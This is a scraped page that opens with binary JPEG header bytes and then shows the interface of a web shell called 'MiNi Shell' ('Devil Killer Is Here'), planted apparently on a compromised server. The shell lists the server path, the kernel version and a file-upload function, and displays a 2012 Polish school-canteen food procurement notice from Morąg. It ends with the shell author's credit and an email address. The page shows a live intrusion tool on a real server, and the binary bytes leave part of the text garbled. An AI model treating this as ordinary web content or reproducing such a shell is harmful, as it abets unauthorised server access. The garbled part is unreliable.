JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/277610-N-2012.html

<p class="kh_header"><b>Morąg: Dostawa artykułów żywnościowych do stołówki szkolnej.</b><br>
<b>Numer ogłoszenia: 277610 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 2 w Morągu im. Władysława Reymonta , ul. Żeromskiego 26, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 0-89 7574777, faks 0-89 7574777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp2morag.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja samorządowa (szkoła).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup z dostawą artykułów żywnościowych do stołówki szkolnej wg. pakietów:Pakiet nr I - Kod CPV 03142300-1 - Jadalne produkty pochodzenia zwierzęcego: 1. Jaja świeże (czyste) - 4840.00 szt. Pakiet nr II - Kod CPV 03212000-0 - Ziemniaki i warzywa suszone: 1. Fasola łuskana - 91.40 kg; 2. Groch łuskany (połówki) - 30.00 kg; 3. Ziemniaki - 10505.00 kg; Ziemniaki młode - 105.00 kg. Pakiet nr III - Kod CPV 03220000-9 - Warzywa, owoce o orzechy: 1. Buraki ćwikłowe - 393.00 kg; 2. Cebula - 319.00 kg; 3. Cebula czerwona - 22.00 kg; 4. Czosnek - 1.00 kg; 5. Jabłka deserowe - 46.00 kg; 6. Kapusta biała - 279.00 kg; 7. Kapusta czerwona - 9.00 kg; 8. Kapusta młoda - 95.00 kg; 9. Kapusta pekińska - 90.50 kg; 10. Kapusta włoska - 98.00 kg; 11. Koper - 70.00 szt.; 12. Marchew - 988.00 kg; 13. Natka z pietruszki - 113.00 szt.; 14. Ogórki świeże - 266.00 kg; 15. Papryka świeża - 54.50 kg; 16. Pieczarki świeże - 121.00 kg; 17. Pietruszka (korzeń) - 398.00 kg; 18. Pomidory - 197.50 kg; 19. Por - 123.00 kg; 20. Rzodkiewka - 3.50 kg; 21. Seler - 197.00 kg. Pakiet nr IV - Kod CPV 15111000-9 - Mięso wołowe: 1. Antrykot - 5.15 kg; 2. Mięso gulaszowe - 101.35 kg; 3. Szponder - 50.70 kg; 4. Udziec - 18.65 kg. Pakiet nr V - Kod CPV 15112000-6 - Drób: 1. Filet z kurczaka - 271.50 kg; 2. Mięso gulaszowe z indyka - 161.00 kg; 3. Porcja rosołowa - 225.60 kg; 4. Uda z kurczaka - 342.60 kg; 5. Wątroba z indyka - 51,80 kg; 6. Żołądki z indyka - 26.00 kg. Pakiet nr VI - Kod CPV 15113000-3 - Wieprzowina: 1. Boczek sur. - 13.00 kg; 2. Golonka (tyl.) - 28.90 kg; 3. Karkówka b/k - 74.30 kg; 4. Kości schabowe - 244.10 kg; 5. Łopatka b/k - 784.80 kg; 6. Mięso garmażeryjne (mielone) - 9.00 kg; 7. Pachwina - 85.05 kg; 8. Schab sur. z/k - 523.95 kg; 9. Szynka sur. b/k - 176.10 kg; 10. Żeberka - 105.05 kg. Pakiet nr VII - Kod - CPV 15114000-0 - Podroby: 1. Flaki woł. (krojone) - 15.00 kg; 2. Wątroba wp. - 25.90 kg. Pakiet nr VIII - Kod CPV 15130000-8 - Produkty mięsne: 1. Boczek wędzony - 118.83 kg; 2. Kiełbasa biała sur. - 43.55 kg; 3. Kiełbasa mazowiecka - 127.39 kg; 4. Kiełbasa mazurska - 36.10 kg; 5. Kiełbasa morlińska - 5.99 kg; 6. Kiełbasa parówkowa - 11.47 kg; 7. Kiełbasa podwawelska - 74.25 kg; 8. Kiełbasa toruńska - 27.20 kg; 9. Kiełbasa zwyczajna - 87.20 kg; 10. Mortadela - 30.94 kg; 11. Parówki śniadaniowe - 19.15 kg. Pakiet nr IX - Kod CPV 15200000-0 - Ryby przetworzone i konserwowane: 1. Filet miruna (mroż.) - 84.00 kg; 2. Filet SOLA (mroż.) - 20.00 kg; 3. Filet z mintaja (mroż.) - 25.00 kg; 4. Filet z tilapii (mroż.) - 105.00 kg; 5. Matias (płaty solone) - 48.00 kg. Pakiet X - Kod CPV 15330000-0 - Przetworzone owoce i warzywa: 1. Brokuły (mroż.) - 64.50 kg; 2. Chrzan tarty - 4,34 kg; 3. Fasola czerwona konserwowa (po odcieku) - 2.00 kg; 4. Fasolka szparagowa konserwowa (po odcieku) - 24.00 kg; 5. Fasolka szparagowa żółta (mroż.) - 10.00 kg; 6. Groszek konserwowy (po odcieku) - 33.12 kg; 7. Kalafior (mroż.) - 58.00 kg; 8. Koncentrat pomidorowy 30% - 72.54 kg; 9. Kukurydza konserwowa (po odcieku) - 14.52 kg; 10. Marchew z groszkiem konserwowa (po odcieku) - 46.37 kg; 11. Włoszczyzna paski (mroż.) - 12.50 kg; 12. Mieszanka kompotowa (mroż.) - 200.00 kg; 13. Mieszanka warzywna (7-składnikowa; mroż.) - 70.00 kg; 14. Mieszanka warzywna euro mix (mroż.) - 20.00 kg; 15. Ogórki konserwowe (po odcieku) - 151.36 kg; 16. Placki ziemniaczane (mroż.) - 282.00 kg; 17. Pomidor konserwowy (po odcieku) - 3.06 kg; 18. Szczaw krojony (po odcieku) - 60.12 kg; 19. Truskawki (mroż.) - 40.00 kg. Pakiet nr XI - Kod CPV 15330000-0 - Przetworzone owoce i warzywa: 1. Kapusta kiszona - 352.00 kg; 2. Ogórek kwaszony - 152.00 kg. Pakiet nr XII - Kod CPV 15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne: 1. Frytura - 5.00 kg; 2. Margaryna zwykła - 7.50 kg; 3. Masło roślinne - 7.00 kg; 4. Olej uniwersalny - 195.60 l.; 5. Planta 109.80 kg; 6. Smalec - 92.00 kg. Pakiet nr XIII - Kod CPV 15500000-3 - Produkty mleczarskie: 1. Ser żółty Gouda - 7.35 kg; 2. Ser żółty Grosik - 1.00 kg; 3. Śmietana 30% - 444.00 l.; 4. Śmietana ukwaszana - 168.60 l.; 5. Twaróg półtłusty - 70.62 kg. Pakiet nr XIV - Kod CPV 15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych: 1. Kasza gryczana - 71.20 kg; 2. Kasza jęczmienna (średnia) - 155.00 kg; 3. Kasza manna - 5.00 kg; 4. Mąka pszenna (typ 550) - 60.00 kg; 5. Ryż długoziarnisty - 90.00 kg; 6. Ryż paraboliczny - 20.00 kg; 7. Syrop owocowy do sporządzania napojów - 572.04 l. Pakiet XV - Kod CPV 15800000-6 - Różne produkty spożywcze: 1. Bazylia - 1.00 kg; 2. Biały barszcz (zupa w proszku) - 14.00 kg; 3. Bulion cielęcy (kostka) - 0.12 kg; 4. Bułka tarta - 95.00 kg; 5. Bułki zwykłe - 1736.00 szt.; 6. Chleb świeży (krojony) - 3195.00 szt.; 7. Ciastka Petitki Lubisie - 9.90 kg; 8. Ciastka pieguski - 29.70 kg; 9. Cukier biały - 290.00 kg; 10. Cukier puder - 9.20 kg; 11. Cukier waniliowy - 0.98 kg; 12. Czekolada mleczna - 22.40 kg; 13. Czekolada mleczna z chrupkami ryżowymi - 48.40 kg; 14. Czosnek granulowany - 1.80 kg; 15. Delicje - 32.93 kg; 16. Fix do spaghetti - 1.00 kg; 17. Hamburger w panierce (mroż.) - 63.00 kg; 18. Ketchup łagodny - 4.00 kg; 19. Ketchup pikantny - 4.80 kg; 20. Knedle ze śliwką (mroż.) - 135 .00 kg; 21. Krokiety z kapustą i grzybami (mroż.) - 170.00 kg; 22. Krokiety z mięsem (mroż.) - 50.00 kg; 23. Kwasek cytrynowy - 0.80 kg; 24. Liść laurowy - 1.00 kg; 25. Majeranek - 1.00 kg; 26. Majonez kętrzyński - 35.96 kg; 27. Makaron z mąki pszennej - 514.10 kg; 28. Musztarda serbska - 3.80 kg; 29. Naleśniki z serem (mroż.) - 360.00 kg; 30. Napój Herbaciany Nestea - 110.00 l.; 31. Ocet spirytusowy 10% - 7.50 l.; 32. Ocet winny - 5.25 l.; 33. Oregano - 1.00 kg; 34. Papryka ostra mielona - 1,62 kg; 35. Papryka słodka mielona - 2.00 kg; 36. Pieprz czarny mielony - 5.00 kg; 37. Pieprz ziołowy - 1,35 kg; 38. Przyprawa Delikat do drobiu - 0.60 kg; 39. Przyprawa Delikat do mięs - 4.00 kg; 40. Przyprawa Delikat uniwersalna - 5,88 kg; 41. Przyprawa do flaków - 1.00 kg; 42. Przyprawa do gulaszu - 1.00 kg; 43. Przyprawa do kurczaka - 7.46 kg; 44. Przyprawa do mięs - 2.00 kg; 45. Przyprawa do pieczonego kurczaka - 2.91 kg; 46. Przyprawa do szaszłyków - 1.31 kg; 47. Przyprawa Kucharek - 4.00 kg; 48. Przyprawa uniwersalna - 8.00 kg; 49. Przyprawa Vegeta - 7.50 kg; 50. Przyprawa Warzywko - 5.00 kg; 51. Pyzy z mięsem (mroż.) - 225.00 kg; 52. Sos bolognese - 15.80 kg; 53. Sos boloński - 1.00 kg; 54. Sos do spaghetti (gotowy) - 3.00 kg; 55. Sos do spaghetti (w proszku) - 3,85 kg; 56. Sos myśliwski (w proszku) - 5.90 kg; 57. Sos pieczeniowy (w proszku) - 5.00 kg; 58. Sos pomidorowy (w proszku) - 0.55 kg; 59. Sól czosnkowa - 2.80 kg; 60. Sól kamienna jodowana spożywcza - 216.00 kg; 61. Ziele angielskie - 1.28 kg; 62. Zupa ogonowa (w proszku) - 6.00 kg; 63. Zupa pieczarkowa (w proszku) - 16.00 kg; 64. Żurek (zupa w proszku) - 19.59..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.23.00-1, 03.21.20.00-0, 03.22.00.00-9, 15.11.10.00-9, 15.11.20.00-6, 15.11.30.00-3, 15.11.40.00-0, 15.13.00.00-8, 15.20.00.00-0, 15.33.00.00-0, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp2morag.republika.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Szkoły Podstawowej nr 2 w Morągu, ul. Żeromskiego 26, 14-300 Morąg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 09:00, miejsce: Sekretariat Szkoły Podstawowej nr 2 w Morągu, ul. Żeromskiego 26, 14-300 Morąg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com